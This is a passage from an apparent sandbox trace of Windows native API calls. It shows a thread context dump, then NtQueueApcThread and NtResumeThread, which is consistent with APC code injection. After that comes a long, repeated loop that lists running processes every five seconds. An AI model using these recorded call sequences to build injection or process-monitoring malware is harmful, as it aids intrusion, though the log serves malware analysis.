[77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0xfffffffa, SegGs=0x0, SegFs=0x6133d0, SegEs=0x0, SegDs=0xcfa98, Edi=0x0, Esi=0xcfb10, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0xffffffff, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x10122, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x70, [5]=0xf8, [6]=0xc, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0xe8, [21]=0xa7, [22]=0x9d, [23]=0x5f, [24]=0xfb, [25]=0x7f, [26]=0x0, [27]=0x0, [28]=0xa0, [29]=0xa, [30]=0x61, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0xa0, [37]=0xda, [38]=0x33, [39]=0x5f, [40]=0xfb, [41]=0x7f, [42]=0x0, [43]=0x0, [44]=0xe5, [45]=0xb8, [46]=0xf0, [47]=0x8, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0193.363] NtQueueApcThread (ThreadHandle=0x218, ApcRoutine=0x8f0b8f2, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0193.369] NtResumeThread (in: ThreadHandle=0x218, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0193.369] NtClose (Handle=0x214) returned 0x0 [0193.369] NtClose (Handle=0x218) returned 0x0 [0193.375] PostThreadMessageW (idThread=0x5d0, Msg=0x111, wParam=0x0, lParam=0x0) returned 0 [0193.382] PostThreadMessageW (idThread=0x5d0, Msg=0x8003, wParam=0xde6d6, lParam=0x0) returned 0 [0193.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0193.385] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0198.440] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0198.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0198.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0198.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0198.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0198.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0198.461] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0203.507] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0203.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0203.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0203.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0203.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0203.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0203.592] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.593] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.597] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.602] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.615] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.622] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.624] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.630] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.632] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.632] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.633] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.636] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.637] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.644] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.645] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.654] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.663] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.669] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.670] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.672] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.676] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.677] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.683] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.689] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, 